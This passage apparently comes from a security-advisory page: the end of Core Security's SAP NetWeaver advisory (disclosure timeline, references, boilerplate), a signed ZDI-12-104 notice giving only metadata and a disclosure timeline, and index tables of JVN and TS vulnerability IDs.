2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2025-000014 Multiple cross-site scripting vulnerabilities in Movable Type 7 hours ago 7 hours ago
jvndb-2025-000015 RevoWorks SCVX and RevoWorks Browser vulnerable to incorrect resource transfer between spheres 8 hours ago 8 hours ago
jvndb-2025-001563 Out-of-bounds write vulnerability in FUJIFILM Business Innovation Corp. MFPs 1 day ago 1 day ago
jvndb-2025-001562 Out-of-bounds read vulnerability in OMRON CX-Programmer 1 day ago 1 day ago
jvndb-2024-000114 Multiple vulnerabilities in baserCMS 3 months ago 1 day ago
jvndb-2025-001548 Out-of-bounds read vulnerability in Cente middleware 2 days ago 2 days ago
jvndb-2025-000012 Multiple vulnerabilities in The LuxCal Web Calendar 2 days ago 2 days ago
jvndb-2025-000013 acmailer CGI and acmailer DB vulnerable to OS command injection 5 days ago 5 days ago
jvndb-2025-000002 Multiple vulnerabilities in NEC Aterm series (NV25-003) 5 days ago 5 days ago
jvndb-2023-002797 Multiple vulnerabilities in ELECOM and LOGITEC network devices 1 year ago 6 days ago
jvndb-2024-001061 ELECOM wireless LAN routers vulnerable to OS command injection 1 year ago 6 days ago
jvndb-2025-000011 Multiple vulnerabilities in FileMegane 6 days ago 6 days ago
jvndb-2025-000010 acmailer vulnerable to cross-site scripting 7 days ago 7 days ago
jvndb-2024-000078 Multiple vulnerabilities in ELECOM wireless LAN routers 6 months ago 7 days ago
jvndb-2025-001017 Multiple vulnerabilities in STEALTHONE D220/D340/D440 13 days ago 13 days ago
jvndb-2025-001016 OMRON NJ/NX series vulnerable to path traversal 13 days ago 13 days ago
jvndb-2025-001018 Improper restriction of XML external entity reference (XXE) vulnerability in OMRON NB-Designer 13 days ago 13 days ago
jvndb-2025-000008 Multiple vulnerabilities in Defense Platform Home Edition 14 days ago 14 days ago
jvndb-2025-000009 WordPress Plugin "Activity Log WinterLock" vulnerable to cross-site request forgery 15 days ago 15 days ago
jvndb-2025-001244 Clickjacking Vulnerability in JP1/ServerConductor/Deployment Manager 20 days ago 20 days ago
jvndb-2025-000007 SXF Common Library vulnerable to improper input data handling 21 days ago 21 days ago
jvndb-2025-001238 Multiple out-of-bounds write vulnerabilities in Canon Office/Small Office Multifunction Printers and Laser Printers 21 days ago 21 days ago
jvndb-2025-000006 WordPress Plugin "Simple Image Sizes" vulnerable to cross-site scripting 22 days ago 22 days ago
jvndb-2025-000005 EXIF Viewer Classic vulnerable to cross-site scripting 23 days ago 23 days ago
jvndb-2025-000004 Multiple vulnerabilities in I-O DATA router UD-LT2 28 days ago 28 days ago
jvndb-2025-000003 FortiWeb vulnerable to SQL injection 29 days ago 29 days ago
jvndb-2025-001027 Linux Ratfor vulnerable to stack-based buffer overflow 1 month ago 1 month ago
jvndb-2025-000001 PLANEX COMMUNICATIONS MZK-DP300N vulnerable to cross-site scripting 1 month ago 1 month ago
jvndb-2024-015471 Trend Micro Deep Security 20.0 Agent (for Windows) vulnerable to uncontrolled search path element 1 month ago 1 month ago
jvndb-2024-015393 Multiple security updates for Trend Micro Apex One and Apex One as a Service (December 2024) 1 month ago 1 month ago
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003
ts-2022-002 TS-2022-002
ts-2022-001 TS-2022-001